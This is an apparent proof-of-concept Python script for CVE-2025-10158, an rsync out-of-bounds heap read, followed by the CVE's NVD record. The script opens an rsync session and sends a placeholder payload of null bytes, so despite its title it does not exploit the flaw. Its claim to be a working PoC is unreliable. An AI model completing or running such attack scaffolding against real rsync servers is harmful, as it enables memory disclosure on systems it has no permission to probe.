CVE-2025-10158

#!/usr/bin/env python3 """ CVE-2025-10158 PoC - rsync Negative Array Index Heap Read This PoC demonstrates how a malicious rsync client can trigger a negative array index leading to out-of-bounds heap read. Note: This is for educational and testing purposes only. """ import socket import struct import time def create_rsync_client_socket(host, port=873): """Create connection to rsync server""" sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((host, port)) return sock def send_rsync_protocol_handshake(sock, module=b"test"): """Send rsync protocol handshake with module request""" # rsync protocol version handshake # @RSYNCD: 30 (protocol version) handshake = b"@RSYNCD: 30\n" sock.send(handshake) time.sleep(0.5) response = sock.recv(1024) print(f"[+] Server response: {response}") # Request module (requires read access) sock.send(module + b"\n") time.sleep(0.5) response = sock.recv(1024) print(f"[+] Module response: {response}") return response def exploit_negative_index(sock): """ Exploit CVE-2025-10158 by sending crafted data that triggers negative array index in rsync server's file list processing. The actual exploit requires deep knowledge of rsync protocol internals and precise payload construction. """ # This is a simplified demonstration structure # Real exploit requires understanding rsync protocol specifics # File list index manipulation # Negative index can be triggered by manipulating file indices malicious_payload = b"\x00" * 100 # Placeholder for actual exploit # Send the malicious payload sock.send(malicious_payload) print("[+] Sent malicious payload to trigger negative index") # Read response - may contain leaked heap memory time.sleep(1) try: response = sock.recv(4096) if response: print(f"[+] Received response (may contain leaked data): {len(response)} bytes") print(f"[+] Raw data: {response[:100]}...") except: pass def main(): target_host = "127.0.0.1" # Change to target IP target_port = 873 # Default rsync port print("[*] CVE-2025-10158 rsync Negative Array Index PoC") print("[*] Target: {}:{}".format(target_host, target_port)) try: sock = create_rsync_client_socket(target_host, target_port) response = send_rsync_protocol_handshake(sock, b"test") if b"OK" in response: print("[+] Successfully connected to rsync module") exploit_negative_index(sock) else: print("[-] Failed to connect to rsync module") sock.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": main() # Note: The actual PoC requires detailed knowledge of rsync protocol # implementation. The vulnerability exists in rsync's file list handling # where a negative index can be used to read before the allocated buffer.

{"cve": {"id": "CVE-2025-10158", "sourceIdentifier": "[email protected]", "published": "2025-11-18T15:16:25.433", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A malicious client acting as the receiver of an rsync file transfer can trigger an out of bounds read of a heap based buffer, via a negative array index. The \n\nmalicious \n\nrsync client requires at least read access to the remote rsync module in order to trigger the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-129"}]}], "references": [{"url": "https://attackerkb.com/assessments/fbacb2a6-d1cd-4011-bb3a-f06b1c8306b1", "source": "[email protected]"}, {"url": "https://github.com/RsyncProject/rsync/commit/797e17fc4a6f15e3b1756538a9f812b63942686f", "source": "[email protected]"}]}}